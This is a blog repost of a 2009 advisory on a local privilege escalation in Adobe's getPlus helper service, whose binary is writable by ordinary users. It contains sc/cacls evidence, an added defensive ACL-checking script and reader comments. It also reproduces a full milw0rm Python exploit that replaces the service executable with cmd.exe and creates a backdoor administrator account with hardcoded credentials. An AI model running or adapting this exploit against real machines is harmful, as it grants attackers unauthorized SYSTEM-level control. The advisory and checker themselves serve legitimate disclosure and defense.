
Adobe-related service (getPlus_HelperSvc.exe) local privilege escalation vulnerability

Description:
The Adobe downloader (meaning the downloader file here) is used to fetch updates for Adobe applications.
Tested on Acrobat Reader 9.x.
The executable is installed with permissions that grant the built-in Users group "full control", so any user can replace the file with one of their own choosing. After the next reboot it will run with "SYSTEM" privileges.
description:
Adobe downloader used to download updates for Adobe applications.
Shipped with Acrobat Reader 9.x

poc:

C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: getPlus(R) Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : getPlus(R) Helper
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <---- [!!!]
                                           NT AUTHORITY\SYSTEM:F
The executable file is installed with improper permissions, with "full
control" for Builtin Users; a simple user can replace it with a binary of
choice.
At the next reboot it will run with SYSTEM privileges.
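A defender-side triage helper, added here as an example and not part of the advisory or of the exploit that follows: it parses `sc qc` and `cacls` output of the form shown above and flags service binaries on which a low-privilege group holds a write-capable permission (Full, Write or Change), reporting the account the service runs as. The getPlus sample is the advisory's own output with the prompt lines removed; the `ExampleSvc` service, its path and its ACL are constructed for contrast, and the function names are the example's own.

```python
import re
from dataclasses import dataclass

# Principals every interactive user belongs to; a write-capable ACE for one of
# these on a service binary lets an ordinary user swap the executable.
LOW_PRIV_TRUSTEES = {
    "everyone",
    "builtin\\users",
    "builtin\\guests",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# cacls permission letters that allow replacing the file: Full, Write, Change.
WRITE_PERMS = {"F", "W", "C"}

SC_FIELD = re.compile(r"^\s*([A-Z_]{2,})\s*:\s*(.*?)\s*$")
CACLS_ACE = re.compile(r"^(?P<trustee>.+?):(?P<inherit>(?:\([A-Z]+\))*)(?P<perm>[NRWCF])$")


@dataclass
class ServiceConfig:
    name: str
    binary_path: str
    start_name: str  # account the service runs as (SERVICE_START_NAME)


@dataclass
class Finding:
    service: str
    binary_path: str
    runs_as: str
    trustee: str
    perm: str


def parse_sc_qc(output: str) -> ServiceConfig:
    """Turn the text of `sc qc <service>` into a ServiceConfig."""
    fields = {}
    for line in output.splitlines():
        m = SC_FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    path = fields.get("BINARY_PATH_NAME", "")
    # A quoted path may be followed by arguments; keep only the quoted part.
    # An unquoted value is taken whole (assumption: it carries no arguments).
    if path.startswith('"') and path.count('"') >= 2:
        path = path[1:path.index('"', 1)]
    return ServiceConfig(
        name=fields.get("SERVICE_NAME", ""),
        binary_path=path,
        start_name=fields.get("SERVICE_START_NAME", ""),
    )


def parse_cacls(output: str, path: str) -> list[tuple[str, str]]:
    """Turn the text of `cacls <path>` into (trustee, permission letter) pairs.

    cacls prints the path once, on the same line as the first ACE; later ACEs
    are indented continuation lines. Inheritance flags such as (OI)(CI) are
    dropped. A '(special access:)' entry is recorded with perm '?' so that it
    is reviewed by hand rather than silently passed.
    """
    aces = []
    for line in output.splitlines():
        s = line.strip()
        if path and s.lower().startswith(path.lower()):
            s = s[len(path):].strip()
        if s.endswith("(special access:)"):
            aces.append((s.split(":", 1)[0], "?"))
            continue
        m = CACLS_ACE.match(s)
        if m:
            aces.append((m.group("trustee"), m.group("perm")))
    return aces


def assess_service(sc_output: str, cacls_output: str) -> list[Finding]:
    """Flag ACEs that let low-privilege principals overwrite the service binary."""
    svc = parse_sc_qc(sc_output)
    findings = []
    for trustee, perm in parse_cacls(cacls_output, svc.binary_path):
        if trustee.lower() in LOW_PRIV_TRUSTEES and (perm in WRITE_PERMS or perm == "?"):
            findings.append(Finding(svc.name, svc.binary_path, svc.start_name, trustee, perm))
    return findings


# Sample input: the advisory's own sc/cacls output, without the prompt lines.
SC_GETPLUS = r"""
SERVICE_NAME: getPlus(R) Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        LOAD_ORDER_GROUP   :
        SERVICE_START_NAME : LocalSystem
"""
CACLS_GETPLUS = r"""
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F
                                           NT AUTHORITY\SYSTEM:F
"""
# Constructed sample of a correctly permissioned service (hypothetical ExampleSvc).
SC_OK = r"""
SERVICE_NAME: ExampleSvc
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" -service
        SERVICE_START_NAME : LocalSystem
"""
CACLS_OK = r"""
C:\Program Files\Example\svc.exe BUILTIN\Users:(OI)(CI)R
                                 BUILTIN\Administrators:(OI)(CI)F
                                 NT AUTHORITY\SYSTEM:(OI)(CI)F
"""

if __name__ == "__main__":
    for sc, acl in ((SC_GETPLUS, CACLS_GETPLUS), (SC_OK, CACLS_OK)):
        hits = assess_service(sc, acl)
        for f in hits:
            print(f"[!] {f.service}: {f.trustee} has {f.perm} on {f.binary_path} (runs as {f.runs_as})")
        if not hits:
            print(f"[ok] {parse_sc_qc(sc).name}: no low-privilege write access to binary")
```

Run it over saved `sc qc` and `cacls` captures from a host (or substitute `icacls` output with a matching parser; the permission letters differ). A hit means the binary should be restored from a trusted copy and the write-capable entry for the low-privilege group removed so that only Administrators and SYSTEM can modify it; the same check belongs in a build-time review of any installer that creates a service running as LocalSystem.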

Yesterday Milw0rm published Python exploit code for this; it reads as follows:

#!/usr/bin/env python
##################################################################################
#
# Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit
# Coded By: Dr_IDE
# Discovered by: Nine:Situations:Group
# Tested On: Windows XP SP2, Requires NOS Package Installed
# Usage: python Dr_IDE-Adobe_912.py
#
##################################################################################

import os, subprocess

#
# Should probably have a try block around this as not every install
# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to
# play around with it.
#
# This is a super lame way to do this but it makes it more educational.
evil =  "echo *************************************************************\n"
evil += "echo *\n"
evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n"
evil += "echo * Coded By: Dr_IDE\n"
evil += "echo * Discovered By: Nine:Situations:Group\n"
evil += "echo * Tested On: Windows XP SP2\n"
evil += "echo *\n"
evil += "echo *************************************************************\n"
evil += "echo This will add user Dr_IDE:password to the Admin Group\n"
evil += "cd C:\\Program Files\\NOS\\bin\n"
evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n"
evil += "copy /Y %systemroot%\\system32\\cmd.exe\n"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n"
evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n"
evil += "exit"

f1 = open('Dr_IDE-Adobe.bat','w');
f1.write(evil);
f1.close();

# Here are two ways to execute this exploit. If you leave both commented just the batch file is created.

# Silent Way - This should be more stealthy
#retval = subprocess.call("Dr_IDE-Adobe.bat");

# Louder Way - On some systems this will probably open a DOS window
#retval = os.system("Dr_IDE-Adobe.bat");

# milw0rm.com [2009-07-27]

Please respect copyright when reposting; source: 秋天博客
Article link: https://www.cfresh.net/web-security/130

  1. 0point
    0point July 29th, 2009 @ 09:01 | #-31

    @真好网
    Who can actually read the Python code? It is indeed a bit hard to follow, but on a closer look it resembles a mix of C and batch-file syntax.

  2. 真好网
    真好网 July 28th, 2009 @ 23:25 | #-32

    Whoa, I can't make sense of it, that's a lot of code.

  3. 0point
    0point July 28th, 2009 @ 10:57 | #-33

    @Tony
    Their annual incomes are measured in millions; even the lowest are in the hundreds of thousands.
    I really hate that I don't have that kind of brains, heh.

  4. TONY
    TONY July 28th, 2009 @ 10:32 | #-34

    I really admire these gurus who can discover 0days.
